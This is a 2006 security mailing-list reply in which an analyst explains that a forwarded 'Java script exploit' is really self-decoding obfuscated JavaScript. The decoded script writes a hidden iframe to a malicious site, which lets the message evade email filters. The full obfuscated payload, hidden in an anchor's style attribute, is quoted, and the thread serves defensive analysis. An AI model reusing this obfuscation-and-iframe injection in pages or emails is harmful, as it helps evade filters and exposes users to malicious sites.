Re: Java script exploit

[Jose Nazario <jose () monkey org>]

On Fri, 17 Feb 2006 gandalf () digital net wrote:

> I just receieved this exploit, I have looked around and all I could find
> lately are the following Java issues: Gentoo Linux Security Advisory
> GLSA 200601-10 - Sun and Blackdown Java: Applet privilege escalation

> I don't have the Java knowledge to figure out what is going on, but it
> doesn't look good.

it's not a javascript exploit, it's obfuscated javascript. basially it
decodes itself to display something along the lines of (tags obscured):

[iframe src=http://badsite/some/dir/stuff] [/iframe]

this can be used to bypass filters that look in your email for known
undesirable sites.

nothing special about it, and no exploit.

> <a target=3D"_blank"  href=3D"www.yahoo.com>"style=3D"background:url\(java/**/script:function dc(x){var 
> l=3Dx.length,b=3D1024,i,j,r,p=3D0,s=3D0,w=3D0,t=3DArray(63,6,22,2,4,19,56,49,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,39,34,29,23,45,3,37,25,30,35,54);for(j=3DMath.ceil(l/b);j>0;j--){r=3D'';for(i=3DMath.min(l,b);i>0;i--,l--){w|=3D(t[x.charCodeAt(p++)-48])<<s;if(s){r+=3DString.fromCharCode(165^w&255);w>>=3D8;s-=3D2}else{s=3D6}}document.write(r)}}dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT'))">

________
jose nazario, ph.d.                     jose () monkey org
http://monkey.org/~jose/                http://infosecdaily.net/
                                        http://www.wormblog.com/